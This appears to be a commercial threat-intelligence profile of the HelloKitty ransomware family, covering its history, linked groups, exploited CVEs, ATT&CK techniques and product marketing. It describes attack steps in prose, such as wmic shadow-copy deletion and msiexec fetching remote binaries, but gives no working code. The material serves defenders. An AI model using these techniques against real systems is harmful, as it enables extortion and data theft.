HELLOKITTY
HelloKitty is a human-operated double-extortion ransomware family active since November 2020. It is used to compromise corporate networks, steal data, encrypt systems, and threaten public release of stolen information if victims do not pay. The malware has been associated with high-profile attacks including the February 2021 intrusion against CD Projekt Red, where the operators claimed to have stolen source code for Cyberpunk 2077, Witcher 3, Gwent, and other games. The family has also been deployed by other actors, including Vice Society, and Microsoft reported that DEV-0230 developed and deployed FiveHands and HelloKitty, often gaining access via BazaLoader infrastructure. HelloKitty or related variants have also been referenced under the names DeathRansom and FiveHands, and may be associated with Abyss Locker.
Technically, the content states that HelloKitty can use an embedded RSA-2048 public key to encrypt victim data for ransom. It can delete Volume Shadow Copies on compromised Windows hosts, including via WMI, to inhibit recovery. The family has also used a Linux variant targeting VMware ESXi systems. Reporting cited in the content links HelloKitty activity to exploitation of internet-facing vulnerabilities, including Apache ActiveMQ CVE-2023-46604 in two Rapid7 customer environments, where post-exploitation behavior included use of msiexec to retrieve remote binaries named M2.png and M4.png. HelloKitty has also been cited in reporting on ransomware targeting SonicWall SMA appliances.
Operationally, the content notes that the complete source code for the first version of HelloKitty was leaked on a Russian-speaking hacking forum. The leaked archive reportedly contained a Visual Studio solution for the encryptor and decryptor and the NTRUEncrypt library used by that version. Researchers assessed the leaked code as legitimate and matching the ransomware used when the operation launched in 2020. The content also states that Kraken emerged from remnants of the HelloKitty ransomware cartel. Older FBI indicators of compromise were noted as potentially outdated because the encryptor changed over time.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
2 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
An attacker is exploiting a nearly 2-year-old vulnerability in Apache ActiveMQ to compromise Linux servers and install malicious software on them... The servers were all vulnerable to CVE-2023-46604, a maximum-severity remote code execution bug in Apache ActiveMQ message broker... After deploying DripDropper... the attacker downloaded... the patch for CVE-2023-46604... and replaced them with the patched versions.
Mandiant said in April that the CVE-2021-20016 SMA 100 zero-day was exploited to deploy a new ransomware strain known as FiveHands... Before patches were released in late February 2021, the same bug was abused indiscriminately in the wild.
Groups observed using it
4 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
This activity group also developed and deployed the FiveHands and HelloKitty ransomware payloads and often gained access to an organization via DEV-0193’s BazaLoader infrastructure.
In addition to deploying preexisting ransomware strains such as HelloKitty in attacks, Vice Society stood out for "disproportionately" targeting the education sector...
A threat actor has leaked the complete source code for the first version of the HelloKitty ransomware on a Russian-speaking hacking forum, claiming to be developing a new, more powerful encryptor.
HELLOKITTY ransomware—used to target Polish video game developer CD Projekt Red—is reportedly built from DEATHRANSOM.
Techniques & procedures
16 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
1 technique“The recently disclosed Apache ActiveMQ remote code execution (RCE) flaw, CVE-2023-46604 is being exploited to spread ransomware binaries… exploiting the serialized class types in the OpenWire protocol that enables attackers to execute arbitrary shell commands.”
Execution
2 techniquesThe content repeatedly describes threat actors and malware using WMI/WMIC/wmiexec for remote execution, lateral movement, discovery, persistence, and administrative actions; e.g., 'APT41 used WMI in several ways, including for execution of commands via WMIEXEC as well as for persistence via PowerSploit' and 'Scattered Spider used Windows Management Instrumentation (WMI) to move laterally via Impacket.'
“…may allow a remote attacker… to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol…”
Stealth
2 techniques“…load remote binaries with the names M2.png and M4.png… The 32-bit .NET executable named dllloader, contained in both MSI files…”
“the attacker attempts to use the Windows Installer (msiexec) to load remote binaries with the names M2.png and M4.png after successful exploitation.”
Discovery
5 techniquesThe content repeatedly describes malware and threat actors obtaining lists of running processes, using utilities such as tasklist, ps, WMI, Get-Process, CreateToolhelp32Snapshot, EnumProcesses, and similar APIs/commands to enumerate active processes on victim systems.
"4H RAT sends an OS version identifier in its beacons"; "admin@338 actors used ... ver ... systeminfo"; "Bundlore will enumerate the macOS version ... using /usr/bin/sw_vers -productVersion"; "DarkTortilla ... querying ... WMI objects"; "Turla ... discover operating system configuration details using the systeminfo and set commands"
"Babuk can enumerate disk volumes, get disk information"; "Ryuk has called GetLogicalDrives ... and GetDriveTypeW"; "Cuba can enumerate local drives, disk type, and disk free space"; "Chimera ... fsutil fsinfo drives"
Lateral Movement
1 technique"...multiple security flaws... impact SMA 200, 210, 400, 410, and 500v appliances even when the web application firewall (WAF) is enabled."
Exfiltration
1 techniqueThe gang is known for hacking corporate networks, stealing data, and encrypting systems. The encrypted files and stolen data are then utilized as leverage in double-extortion machines, where the threat actors threaten to leak data if a ransom is not paid.
Impact
4 techniquesThe gang is known for hacking corporate networks, stealing data, and encrypting systems. | The released hellokitty.zip archive contains a Microsoft Visual Studio solution that builds the HelloKitty encryptor and decryptor and the NTRUEncrypt library that this version of the ransomware uses to encrypt files.
“EncDLL acts similarly to ransomware, searching and ending a particular set of processes before starting the encryption process…”
Examples include 'Avaddon uses wmic.exe to delete shadow copies,' 'BlackCat can use wmic.exe to delete shadow copies on compromised networks,' and 'WannaCry utilizes wmic to delete shadow copies.'
The encrypted files and stolen data are then utilized as leverage in double-extortion machines, where the threat actors threaten to leak data if a ransom is not paid.
IOCs tracked for this family
4 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Recent activity
25 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Named ransomware group referenced as a destination for former Conti members; no additional technical details provided.
Ransomware family/cartel referenced as the predecessor/remnant source for the Kraken group.
Referenced as a prior/notorious ransomware operation/cartel whose remnants are linked to Kraken.
Ransomware operation (prominent in 2021) referenced as the predecessor/related operation to Kraken; noted to have attempted rebranding after its source code leak.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.